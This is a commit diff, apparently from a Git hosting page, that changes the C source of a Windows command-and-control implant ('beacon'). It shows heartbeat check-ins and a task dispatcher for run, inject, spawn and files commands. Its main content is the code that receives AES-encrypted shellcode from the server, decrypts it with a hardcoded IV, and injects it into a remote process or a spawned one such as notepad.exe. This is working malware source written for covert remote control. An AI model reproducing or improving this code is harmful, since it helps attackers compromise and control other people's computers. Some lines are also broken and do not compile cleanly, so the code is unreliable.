Added new beacon to repo. Fixed injection logic for new beacon.
This commit is contained in:
Pavlo Khazov
@@ -76,17 +76,10 @@ void ReceiveResponse(Transport* transport) {
|
||||
|
||||
// Check-in with server
|
||||
void SendHeartbeat(Transport* transport) {
|
||||
char heartbeatMessage[64];
|
||||
snprintf(heartbeatMessage, sizeof(heartbeatMessage), "%s~HEARTBEAT", agentID);
|
||||
// printf("Preparing to send heartbeat: %s\n", heartbeatMessage);
|
||||
char heartbeat_message[32];
|
||||
snprintf(heartbeat_message, sizeof(heartbeat_message), "%s~HEARTBEAT", agentID);
|
||||
|
||||
if (!transport || !transport->handle || !transport->send) {
|
||||
fprintf(stderr, "Error: Invalid transport object (transport=%p, handle=%p, send=%p)\n",
|
||||
(void*)transport, transport ? transport->handle : NULL, transport ? (void*)transport->send : NULL);
|
||||
return;
|
||||
}
|
||||
|
||||
int sent = transport->send(transport->handle, heartbeatMessage, strlen(heartbeatMessage));
|
||||
int sent = transport->send(transport->handle, heartbeat_message, strlen(heartbeat_message));
|
||||
if (sent <= 0) {
|
||||
fprintf(stderr, "Error: Failed to send heartbeat, returned %d\n", sent);
|
||||
CleanupTransport(transport);
|
||||
|
||||
@@ -189,6 +189,7 @@ void SendSysInfo(char* result) {
|
||||
}
|
||||
#endif
|
||||
|
||||
// Differentiate between tasks
|
||||
void HandleTask(Transport* transport, char* taskID, char* task_type, char* task_args) {
|
||||
char result[STD_BUFF];
|
||||
|
||||
@@ -205,10 +206,10 @@ void HandleTask(Transport* transport, char* taskID, char* task_type, char* task_
|
||||
SendTaskResult(transport, "", result);
|
||||
}
|
||||
else if (strcmp(task_type, "run") == 0) {
|
||||
ReceiveModule(transport, task_args, task_args);
|
||||
ReceiveModule(result, transport, task_type, task_args);
|
||||
}
|
||||
else if (strcmp(task_type, "inject") == 0 || strcmp(task_type, "spawn") == 0) {
|
||||
ReceiveModule(transport, task_type, task_args);
|
||||
ReceiveModule(result, transport, task_type, task_args);
|
||||
}
|
||||
else if (strcmp(task_type, "files") == 0) {
|
||||
SendFiles(transport, NULL, 0);
|
||||
|
||||
@@ -7,6 +7,8 @@
|
||||
#include "config.h"
|
||||
#include "aes.c"
|
||||
|
||||
unsigned char iv[] = "sWDv47xwoMkg5gJY"; // 16 bytes
|
||||
|
||||
// Inject into running process
|
||||
void InjectRemote(char* key, DWORD targetPID, unsigned char* shellcode, SIZE_T payloadSize) {
|
||||
HANDLE hProcess = NULL;
|
||||
@@ -27,9 +29,6 @@ void InjectRemote(char* key, DWORD targetPID, unsigned char* shellcode, SIZE_T p
|
||||
goto cleanup;
|
||||
}
|
||||
|
||||
// Decrypt the shellcode before injecting
|
||||
unsigned char iv[] = "sWDv47xwoMkg5gJY"; // 16 bytes
|
||||
|
||||
// Decrypt locally using tiny-AES-c
|
||||
struct AES_ctx ctx;
|
||||
AES_init_ctx_iv(&ctx, key, iv);
|
||||
@@ -172,9 +171,6 @@ void SpawnNew(char* key, char* path, unsigned char* shellcode, int payloadSize,
|
||||
}
|
||||
printf("Memory allocation successful");
|
||||
|
||||
// Decrypt the shellcode before injecting
|
||||
unsigned char iv[] = "sWDv47xwoMkg5gJY"; // 16 bytes
|
||||
|
||||
// Decrypt locally using tiny-AES-c
|
||||
struct AES_ctx ctx;
|
||||
AES_init_ctx_iv(&ctx, key, iv);
|
||||
@@ -221,7 +217,7 @@ cleanup:
|
||||
if (pinfo.hThread) CloseHandle(pinfo.hThread);
|
||||
}
|
||||
|
||||
void ExecuteInMemory(unsigned char* encryptedPayload, int payloadSize, int sleepTime) {
|
||||
void ExecuteInMemory(char* key, unsigned char* encryptedPayload, int payloadSize, int sleepTime) {
|
||||
printf("Payload size: %d\n", payloadSize);
|
||||
|
||||
if (sleepTime <= 0) sleepTime = 3600;
|
||||
@@ -234,14 +230,11 @@ void ExecuteInMemory(unsigned char* encryptedPayload, int payloadSize, int sleep
|
||||
memcpy(allocated_mem, encryptedPayload, payloadSize);
|
||||
Sleep(sleepTime / 2);
|
||||
|
||||
// dummy
|
||||
char key = "qwe";
|
||||
char iv = "qwe";
|
||||
|
||||
// Decrypt in-place using tiny-AES
|
||||
struct AES_ctx ctx;
|
||||
AES_init_ctx_iv(&ctx, key, iv);
|
||||
AES_CTR_xcrypt_buffer(&ctx, (byte*)allocated_mem, payloadSize);
|
||||
memset(key, 0, 16);
|
||||
|
||||
printf("Decrypted payload (first 32 bytes):\n");
|
||||
for (int i = 0; i < 32 && i < payloadSize; i++) {
|
||||
@@ -306,16 +299,19 @@ void RunEXEFromDisk(char* exePath, Transport* transport) {
|
||||
SendTaskResult(transport, "", "Process executed successfully\n");
|
||||
}
|
||||
|
||||
void ReceiveModule(Transport* transport, char* taskType, char* taskArgs) {
|
||||
// Receive payload over network
|
||||
void ReceiveModule(char* result, Transport* transport, char* taskType, char* taskArgs) {
|
||||
char* key = strtok(taskArgs, "~");
|
||||
char* taskArg1 = strtok(NULL, "~");
|
||||
char* taskArg2 = strtok(NULL, "~");
|
||||
char* sizeBuf = strtok(NULL, "");
|
||||
// Example message
|
||||
// TASK~spawn~bin~C:\Windows\system32\notepad.exe~9084~1201774
|
||||
printf("Task type: %s\n", taskType);
|
||||
printf("Key: %s\n", key);
|
||||
printf("Argument 1: %s\n", taskArg1);
|
||||
printf("Argument 2: %s\n", taskArg2);
|
||||
printf("Size buf: %s\n", sizeBuf);
|
||||
|
||||
// Parse payload size based on type of command
|
||||
int payloadSize;
|
||||
@@ -358,62 +354,7 @@ void ReceiveModule(Transport* transport, char* taskType, char* taskArgs) {
|
||||
}
|
||||
printf("Received full module of size: %d bytes\n", bytesReceived);
|
||||
|
||||
// Process exe and dll files (write to disk first)
|
||||
// if (strcmp(payloadType, "exe") == 0 || strcmp(payloadType, "dll") == 0) {
|
||||
// // Decrypt before writing to disk
|
||||
// struct AES_ctx ctx;
|
||||
// AES_init_ctx_iv(&ctx, key, iv);
|
||||
// AES_CTR_xcrypt_buffer(&ctx, payloadBuffer, payloadSize);
|
||||
|
||||
// printf("Decrypted payload (first 32 bytes):\n");
|
||||
// for (int i = 0; i < 32 && i < payloadSize; i++) {
|
||||
// printf("%02x ", payloadBuffer[i]);
|
||||
// if ((i + 1) % 16 == 0) printf("\n");
|
||||
// }
|
||||
// printf("\n");
|
||||
if (0) {
|
||||
|
||||
}
|
||||
// char fileName[32];
|
||||
// if (strcmp(payloadType, "exe") == 0) {
|
||||
// sprintf(fileName, "module.exe");
|
||||
// }
|
||||
// else if (strcmp(payloadType, "dll") == 0) {
|
||||
// sprintf(fileName, "module.dll");
|
||||
// }
|
||||
// else if (strcmp(payloadType, "bin") == 0) {
|
||||
// printf("Shellcode detected\n");
|
||||
// }
|
||||
// else {
|
||||
// printf("Unsupported payload type: %s\n", payloadType);
|
||||
// memset(payloadBuffer, 0, payloadSize);
|
||||
// return;
|
||||
// }
|
||||
|
||||
// FILE* file = fopen(fileName, "wb");
|
||||
// if (!file) {
|
||||
// printf("Failed to open file for writing: %s\n", fileName);
|
||||
// memset(payloadBuffer, 0, payloadSize);
|
||||
// return;
|
||||
// }
|
||||
// size_t written = fwrite(payloadBuffer, 1, payloadSize, file);
|
||||
// if (written != payloadSize) {
|
||||
// printf("Error writing data to file: %s\n", fileName);
|
||||
// memset(payloadBuffer, 0, payloadSize);
|
||||
// fclose(file);
|
||||
// return;
|
||||
// }
|
||||
// fclose(file);
|
||||
// printf("Module data written to: %s\n", fileName);
|
||||
|
||||
// if (strcmp(payloadType, "exe") == 0) {
|
||||
// RunEXEFromDisk(fileName, transport);
|
||||
// }
|
||||
// else if (strcmp(payloadType, "dll") == 0) {
|
||||
// RunDLLFromDisk(fileName, "ExecuteModule", transport);
|
||||
// }
|
||||
|
||||
else if (strcmp(taskType, "inject") == 0) {
|
||||
if (strcmp(taskType, "inject") == 0) {
|
||||
int pid = atoi(taskArg1);
|
||||
InjectRemote(key, pid, payloadBuffer, payloadSize);
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user